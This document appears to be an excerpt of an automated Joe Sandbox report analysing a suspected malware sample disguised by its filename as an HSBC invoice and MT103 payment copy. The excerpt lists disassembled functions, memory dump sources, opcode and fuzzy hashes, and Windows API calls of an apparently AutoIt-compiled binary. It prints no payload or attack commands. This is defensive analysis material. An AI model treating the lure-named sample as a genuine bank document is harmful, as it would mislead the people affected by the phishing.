                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: 9049c267a3f59ac13cdd432e0023365f5d0143dcb05dd8dd2a239fcef29a05d2
                    • Instruction ID: 1b65b4396e43052bb5ec679ea188db4630657b7a8d374d12ba6ee0f16eb7529c
                    • Opcode Fuzzy Hash: 9049c267a3f59ac13cdd432e0023365f5d0143dcb05dd8dd2a239fcef29a05d2
                    • Instruction Fuzzy Hash: 18A0113000820CABCA002B82EC08888BFACEA002A0B008020F80C808228B32A820AA80
                    Function 00E98A0E Relevance: .6, Instructions: 608COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 12dbe763a02e87719b89e4dc79616e21f37d49d8f30c6f0941bacd7c39902ffe
                    • Instruction ID: 75cddf3d90130fbde8357d2cd4c7ecd4cd8155fdb4f6f0cf5be2eb99c1d12a52
                    • Opcode Fuzzy Hash: 12dbe763a02e87719b89e4dc79616e21f37d49d8f30c6f0941bacd7c39902ffe
                    • Instruction Fuzzy Hash: 08222A31505615CBDF388F24C6946BDB7A1EB03308F68646BD852BB3A1EB34DD82DB61
                    Function 00EA2405 Relevance: .3, Instructions: 345COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                    • Instruction ID: b6569bf24f4fb32519d62c68f195598c27664ac7b0d39e6ea65735f2cb9dd880
                    • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                    • Instruction Fuzzy Hash: 78C180362050A30ADB6D463D943403EBEE15EA77B531A279DE4B2FF5C4EF20E524E620
                    Function 00EA283A Relevance: .3, Instructions: 341COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                    • Instruction ID: 0a498e998ab5fbc64516cf93272ba7534e9069f07b333da2adbf6c8dbf396e69
                    • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                    • Instruction Fuzzy Hash: 77C182362051A30ADB6D463D843403EBEE15EA77B531A27ADE4B2FF5D4EF20E5249620
                    Function 00EA1BB8 Relevance: .3, Instructions: 323COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                    • Instruction ID: 1c1214552a72de12ce12e84b70acbac49362d2217005addbc164062bb7396afe
                    • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                    • Instruction Fuzzy Hash: 99C192363051A30DDB6D4639843403EBEE15EA77B671A27EDE4B2EF5C4EF20E5249610
                    Function 00E23660 Relevance: .1, Instructions: 92COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272013729.0000000000E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e20000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                    • Instruction ID: a57a883ba2e44c2fb167e4d02e7a48f239b9880a13efd84d68321ff758baa9d0
                    • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                    • Instruction Fuzzy Hash: D341D571D1051CEBCF48CFADC991AEEBBF1AF88201F548299D516AB345D734AB41DB40
                    Function 00E234F0 Relevance: .0, Instructions: 35COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272013729.0000000000E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e20000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                    • Instruction ID: 65bf43915d732206d9ff0c2a4eaeb8f7cbcf8507161562845083494f17d7d3bf
                    • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                    • Instruction Fuzzy Hash: A0018079A00109EFCB48DFA8D5909AEF7F5FB48310B208599E919A7701D735AE41DF80
                    Function 00E23550 Relevance: .0, Instructions: 35COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272013729.0000000000E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e20000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                    • Instruction ID: 4711897f55a1770bd74af2ff5711833a403252c9b8d86e32a7da2411b3924c50
                    • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                    • Instruction Fuzzy Hash: 0B018078A00109EFCB44DFA8D5909AEFBF5FB48310B208599E819A7701D734AE41DF80
                    Function 00E21E70 Relevance: .0, Instructions: 6COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272013729.0000000000E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e20000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                    • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                    • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                    • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                    Function 00F037F3 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                    Download Yara Rule
                    APIs
                    • CharUpperBuffW.USER32(?,?,00F0F910), ref: 00F038AF
                    • IsWindowVisible.USER32(?), ref: 00F038D3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: BuffCharUpperVisibleWindow
                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                    • API String ID: 4105515805-45149045
                    • Opcode ID: d23868cecb87ca643f1c8ca71d7917a0515be1ab29f8233be31c7c67255ac9b2
                    • Instruction ID: f3a289ba1d6da0b207771acb4217f9e722f03de8e974fd2d3a0923959db9ff68
                    • Opcode Fuzzy Hash: d23868cecb87ca643f1c8ca71d7917a0515be1ab29f8233be31c7c67255ac9b2
                    • Instruction Fuzzy Hash: 3DD1A4716043058BCB14EF10C891A6A77E9EF98354F159459F88A6B3E3CB31EE0BEB41
                    Function 00F0A849 Relevance: 49.8, APIs: 33, Instructions: 274COMMON
                    Download Yara Rule
                    APIs
                    • SetTextColor.GDI32(?,00000000), ref: 00F0A89F
                    • GetSysColorBrush.USER32(0000000F), ref: 00F0A8D0
                    • GetSysColor.USER32(0000000F), ref: 00F0A8DC
                    • SetBkColor.GDI32(?,000000FF), ref: 00F0A8F6
                    • SelectObject.GDI32(?,?), ref: 00F0A905
                    • InflateRect.USER32(?,000000FF,000000FF), ref: 00F0A930
                    • GetSysColor.USER32(00000010), ref: 00F0A938
                    • CreateSolidBrush.GDI32(00000000), ref: 00F0A93F
                    • FrameRect.USER32(?,?,00000000), ref: 00F0A94E
                    • DeleteObject.GDI32(00000000), ref: 00F0A955
                    • InflateRect.USER32(?,000000FE,000000FE), ref: 00F0A9A0
                    • FillRect.USER32(?,?,?), ref: 00F0A9D2
                    • GetWindowLongW.USER32(?,000000F0), ref: 00F0A9FD
                      • Part of subcall function 00F0AB60: GetSysColor.USER32(00000012), ref: 00F0AB99
                      • Part of subcall function 00F0AB60: SetTextColor.GDI32(?,?), ref: 00F0AB9D
                      • Part of subcall function 00F0AB60: GetSysColorBrush.USER32(0000000F), ref: 00F0ABB3
                      • Part of subcall function 00F0AB60: GetSysColor.USER32(0000000F), ref: 00F0ABBE
                      • Part of subcall function 00F0AB60: GetSysColor.USER32(00000011), ref: 00F0ABDB
                      • Part of subcall function 00F0AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F0ABE9
                      • Part of subcall function 00F0AB60: SelectObject.GDI32(?,00000000), ref: 00F0ABFA
                      • Part of subcall function 00F0AB60: SetBkColor.GDI32(?,00000000), ref: 00F0AC03
                      • Part of subcall function 00F0AB60: SelectObject.GDI32(?,?), ref: 00F0AC10
                      • Part of subcall function 00F0AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 00F0AC2F
                      • Part of subcall function 00F0AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F0AC46
                      • Part of subcall function 00F0AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 00F0AC5B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                    • String ID:
                    • API String ID: 4124339563-0
                    • Opcode ID: 7efb4b3424d194170e2a7bbec72fc42dfd3065d2112f45019a77a98b8c0f64c4
                    • Instruction ID: e13158a6feaca2a82b6838d4095c51cc8e6cccb75c8989b19eb12c7251c7ad0f
                    • Opcode Fuzzy Hash: 7efb4b3424d194170e2a7bbec72fc42dfd3065d2112f45019a77a98b8c0f64c4
                    • Instruction Fuzzy Hash: 91A19C72508305EFD7209F64DC08A6BBBA9FF89331F144A29F962D61E0D735D848EB52
                    Function 00EF77BE Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                    Download Yara Rule
                    APIs
                    • DestroyWindow.USER32(00000000), ref: 00EF77F1
                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00EF78B0
                    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00EF78EE
                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00EF7900
                    • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00EF7946
                    • GetClientRect.USER32(00000000,?), ref: 00EF7952
                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00EF7996
                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00EF79A5
                    • GetStockObject.GDI32(00000011), ref: 00EF79B5
                    • SelectObject.GDI32(00000000,00000000), ref: 00EF79B9
                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00EF79C9
                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00EF79D2
                    • DeleteDC.GDI32(00000000), ref: 00EF79DB
                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00EF7A07
                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 00EF7A1E
                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00EF7A59
                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00EF7A6D
                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 00EF7A7E
                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00EF7AAE
                    • GetStockObject.GDI32(00000011), ref: 00EF7AB9
                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00EF7AC4
                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00EF7ACE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                    • API String ID: 2910397461-517079104
                    • Opcode ID: 825001881c8d196d33399b29b5417392b2eb42e0b284b568ca27fbeb27008a22
                    • Instruction ID: d44ac87204ec994e07373b72aadb0906a3459194818667b76febf9715cbd9e94
                    • Opcode Fuzzy Hash: 825001881c8d196d33399b29b5417392b2eb42e0b284b568ca27fbeb27008a22
                    • Instruction Fuzzy Hash: 02A15F75A40219BFEB14DBA4DC4AFAE7BB9EB49710F044114FA19E72E0C7B0AD04DB61
                    Function 00EEAF7B Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                    Download Yara Rule
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 00EEAF89
                    • GetDriveTypeW.KERNEL32(?,00F0FAC0,?,\\.\,00F0F910), ref: 00EEB066
                    • SetErrorMode.KERNEL32(00000000,00F0FAC0,?,\\.\,00F0F910), ref: 00EEB1C4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ErrorMode$DriveType
                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                    • API String ID: 2907320926-4222207086
                    • Opcode ID: 1f335f339c1f0a24f0e57d0bc1948e95b4a4f91c265c8b90f8bd6ba4c975457a
                    • Instruction ID: 9abbc3f335ec2f3b01adc6429f19620ac5393185bb445900719cb2cedb303f4d
                    • Opcode Fuzzy Hash: 1f335f339c1f0a24f0e57d0bc1948e95b4a4f91c265c8b90f8bd6ba4c975457a
                    • Instruction Fuzzy Hash: 7951C13068138DEBCB14EB13C9E29BE73F0AB54365B246026E44AB7291D735ED41EB43
                    Function 00E86A3C Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: __wcsnicmp
                    • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                    • API String ID: 1038674560-86951937
                    • Opcode ID: f2a05ac2dfdc6125a3afa36c933f4435a0a581d1653567d81c1e89c53b81c5d9
                    • Instruction ID: c759e0256e06fb9216690c9864a0f20e3954eaaad4eddecac0ba95c75d29e679
                    • Opcode Fuzzy Hash: f2a05ac2dfdc6125a3afa36c933f4435a0a581d1653567d81c1e89c53b81c5d9
                    • Instruction Fuzzy Hash: 888145B1600215BBCB25BF60CD82FEF37A8AF16704F046025F94DBA1C2EB60EA51D791
                    Function 00E82C18 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 486windowCOMMON
                    Download Yara Rule
                    APIs
                    • DestroyWindow.USER32(?,?,?), ref: 00E82CA2
                    • DeleteObject.GDI32(00000000), ref: 00E82CE8
                    • DeleteObject.GDI32(00000000), ref: 00E82CF3
                    • DestroyCursor.USER32(00000000), ref: 00E82CFE
                    • DestroyWindow.USER32(00000000,?,?,?), ref: 00E82D09
                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 00EBC68B
                    • 6F570200.COMCTL32(?,000000FF,?), ref: 00EBC6C4
                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00EBCAED
                      • Part of subcall function 00E81B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E82036,?,00000000,?,?,?,?,00E816CB,00000000,?), ref: 00E81B9A
                    • SendMessageW.USER32(?,00001053), ref: 00EBCB2A
                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00EBCB41
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: DestroyMessageSendWindow$DeleteObject$CursorF570200InvalidateMoveRect
                    • String ID: 0
                    • API String ID: 2008601239-4108050209
                    • Opcode ID: 3084c8f4d4bcf36ba6c4f94cddd97f1bb538b0aad7506be72575b0488234fa1d
                    • Instruction ID: 6ca861d91b18a2507552a23fb36f331c56ac147dc5429b0b1db9e60b8e5fbeb6
                    • Opcode Fuzzy Hash: 3084c8f4d4bcf36ba6c4f94cddd97f1bb538b0aad7506be72575b0488234fa1d
                    • Instruction Fuzzy Hash: C412A130608201EFDB24DF24C884BAAB7E5BF45304F64556DF59AEB662C731EC41DB91
                    Function 00F0AB60 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetSysColor.USER32(00000012), ref: 00F0AB99
                    • SetTextColor.GDI32(?,?), ref: 00F0AB9D
                    • GetSysColorBrush.USER32(0000000F), ref: 00F0ABB3
                    • GetSysColor.USER32(0000000F), ref: 00F0ABBE
                    • CreateSolidBrush.GDI32(?), ref: 00F0ABC3
                    • GetSysColor.USER32(00000011), ref: 00F0ABDB
                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F0ABE9
                    • SelectObject.GDI32(?,00000000), ref: 00F0ABFA
                    • SetBkColor.GDI32(?,00000000), ref: 00F0AC03
                    • SelectObject.GDI32(?,?), ref: 00F0AC10
                    • InflateRect.USER32(?,000000FF,000000FF), ref: 00F0AC2F
                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F0AC46
                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00F0AC5B
                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00F0ACA7
                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00F0ACCE
                    • InflateRect.USER32(?,000000FD,000000FD), ref: 00F0ACEC
                    • DrawFocusRect.USER32(?,?), ref: 00F0ACF7
                    • GetSysColor.USER32(00000011), ref: 00F0AD05
                    • SetTextColor.GDI32(?,00000000), ref: 00F0AD0D
                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00F0AD21
                    • SelectObject.GDI32(?,00F0A869), ref: 00F0AD38
                    • DeleteObject.GDI32(?), ref: 00F0AD43
                    • SelectObject.GDI32(?,?), ref: 00F0AD49
                    • DeleteObject.GDI32(?), ref: 00F0AD4E
